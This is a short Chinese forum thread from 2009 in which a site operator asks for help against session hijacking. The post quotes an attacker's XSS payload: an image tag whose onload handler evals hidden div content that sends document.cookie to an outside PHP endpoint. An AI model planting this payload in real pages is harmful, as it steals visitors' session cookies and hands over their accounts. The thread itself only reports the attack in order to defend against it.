主题: 有人通过onload 来对网站的会话劫持,急求解决办法!!!!!
作者: 钦, 发布日期: 2009-08-21 15:22:29, 浏览数: 7189
<img border="" alt="" src="/uda/2009/8/21/50m3ouo.jpg" onload="eval($('xxoo').innerHTML)" style="width: 490px; height: 868px;"/>
<div id="xxoo" style="display: none;">new Image().src="http://www.19870202.com/1.php?sid="+document.cookie</div>

有人通过这样类似的代码进行会话劫持, 有办法解决吗?。。
作者: Roddy, 发布日期: 2009-08-21 16:14:42
回复
发表新帖 发表回复